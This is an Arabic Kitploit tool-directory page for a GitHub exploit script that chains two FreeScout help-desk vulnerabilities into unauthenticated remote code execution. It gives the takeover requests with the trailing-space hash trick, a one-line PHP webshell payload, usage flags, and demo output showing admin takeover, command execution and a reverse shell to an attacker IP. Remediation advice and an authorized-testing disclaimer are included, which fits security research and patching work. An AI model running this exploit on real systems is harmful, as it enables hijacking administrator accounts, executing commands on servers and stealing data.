Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53595_exploit — نص استغلال يربط CVE-2026-53595 (الاستيلاء على حساب مجهول) و CVE-2026-53593 (رفع .pht) لتنفيذ تعليمات برمجية عن بعد غير مصادق عليه في برنامج مساعدة مكتب FreeScout. | Kitploit
أدوات/GitHubGitHub/0xdak/cve-2026-53595_exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHub0xdak/cve-2026-53595_exploit

CVE-2026-53595_exploit

نص استغلال يربط CVE-2026-53595 (الاستيلاء على حساب مجهول) و CVE-2026-53593 (رفع .pht) لتنفيذ تعليمات برمجية عن بعد غير مصادق عليه في برنامج مساعدة مكتب FreeScout.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-53595 (+ CVE-2026-53593) — استيلاء مجهول على حساب في FreeScout → تنفيذ تعليمات برمجية عن بُعد (RCE)

تنفيذ تعليمات برمجية عن بُعد دون مصادقة في FreeScout ≤ 1.8.223 (نظام دعم فني مبني على Laravel) عبر ربط ثغرتين، وكلتاهما أُصلحتا في 1.8.224:

  • CVE-2026-53595 — استيلاء مجهول على الحساب. يختار POST /user-setup/{hash}/{invite_sent_at} الحساب عبر عمود invite_hash فقط. المستخدم المفعَّل لديه invite_hash = ''، وعلى MySQL/MariaDB فإن تساوي VARCHAR يتجاهل المسافات اللاحقة، لذا فإن hash = %20 يطابق حساب المسؤول. بوابة انتهاء الصلاحية invite_sent_at تفك تشفير القيمة باستخدام كلمة مرور المستخدم كمفتاح، لكن دالة فك التشفير تعيد الإدخال الخام عند الفشل (كتلة catch فارغة)، وبالتالي يُقبل طابع زمني حالي غير مشفَّر بصيغة unix. بعدها تستبدل نقطة النهاية البريد الإلكتروني وكلمة مرور الحساب وتُسجّل دخولك.
  • CVE-2026-53593 — رفع مصادق عليه لملف .pht. القائمة السوداء للرفع (php.*|sh|pl|phtml|phar) لا تغطي .pht، الذي ينفّذه Apache mod_php كملف PHP.
  • اربط بينهما وسيحصل مهاجم غير مصادق على تنفيذ تعليمات برمجية بصلاحيات مستخدم خادم الويب (www-data).

    ماذا يفعل

    1. GET /user-setup/%20/<unix_ts> للحصول على كوكي جلسة + رمز CSRF.
    2. POST إلى نفس الرابط لاستبدال البريد الإلكتروني/كلمة مرور المسؤول وتسجيل الدخول (ATO).
    3. POST /uploads/upload لملف shell.pht (<?php system($_GET['c']); ?>).
    4. تشغيل أمر عبر القشرة الويب، أو فتح قشرة عكسية.

    الاستخدام

    root@kitploit:~
    ./exploit.sh -t <target> [options]
       -t, --target URL     target base URL (e.g. http://10.10.10.10)   [required]
       -c, --cmd CMD        run a single command (default: id)
           --lhost IP       reverse shell: attacker IP (start nc first)
           --lport PORT     reverse shell port (default 4444)
           --email ADDR     email to set on the seized admin (default [email protected])
           --password PASS  password to set (default Pwned12345)
       -h, --help
    

    عرض توضيحي

    root@kitploit:~
    $ ./exploit.sh -t http://10.10.10.10
    [*] fetching setup form (hash=%20, ts=1784500000) ...
    [*] seizing admin -> [email protected] / Pwned12345 ...
    [+] admin account taken over (you can also log in at http://10.10.10.10/login)
    [*] uploading .pht webshell ...
    [+] webshell: http://10.10.10.10/storage/uploads/p2Bj81XDu6DbBJ4Sq5mYW05zY.pht
    [+] id -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    $ ./exploit.sh -t http://10.10.10.10 -c 'cat /var/www/local.txt'
    ...
    [+] cat /var/www/local.txt -> f1a7c30e9b6d24851e6d24851f1a7c30
    
    # reverse shell (run `nc -lvnp 4444` first)
    $ ./exploit.sh -t http://10.10.10.10 --lhost 10.10.14.7 --lport 4444
    [+] admin account taken over ...
    [+] webshell: http://10.10.10.10/storage/uploads/....pht
    [*] sending reverse shell to 10.10.14.7:4444 ...
    [+] payload sent — check your listener.
    

    المتطلبات

    • bash, curl, jq

    ملاحظات

    • يعمل على FreeScout 1.0.x – 1.8.223؛ الإصدار 1.8.224+ يصلح الثغرتين (302 يتحول إلى محاولة استيلاء فاشلة).
    • تنفيذ RCE يحدث بصلاحيات www-data (مستخدم Apache). يعتمد تنفيذ .pht على كون الخادم يشغّل ملفات .pht عبر mod_php — بيئة «Apache القياسي + libapache2-mod-php» التي تستهدفها الثغرة.
    • تُرمَّز القشرة العكسية base64 قبل وصولها إلى القشرة الويب: يعمل system() عبر /bin/sh (dash على Debian/Ubuntu)، الذي لا يفهم إعادة التوجيه >& /dev/tcp/... الخاصة بـ bash فقط، كما أن base64 يتجنب جميع مشاكل علامات الاقتباس.
    • كلمة المرور الافتراضية لا تحتوي على ! عمدًا — فعلامة ! تستدعي توسيع السجل (history expansion) في bash/zsh التفاعلي وتُفسد الأوامر الملصقة.

    المعالجة

    • الترقية إلى FreeScout 1.8.224+.
    • لا تستخدم أبدًا تساوي VARCHAR لرموز الأمان (تصادمات المسافات اللاحقة)، ولا تتعامل أبدًا مع فك التشفير الفاشل كقيمة صالحة — ارفض الرموز الفارغة/غير الصالحة.
    • استخدم قائمة بيضاء للرفع، وخزّن الملفات المرفوعة خارج الجذر الرئيسي للويب، وقدّمها عبر معالج لا ينفّذها أبدًا.

    إخلاء مسؤولية

    لأغراض اختبار الاختراق المصرح به والتعليم فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

    تنزيل الأداة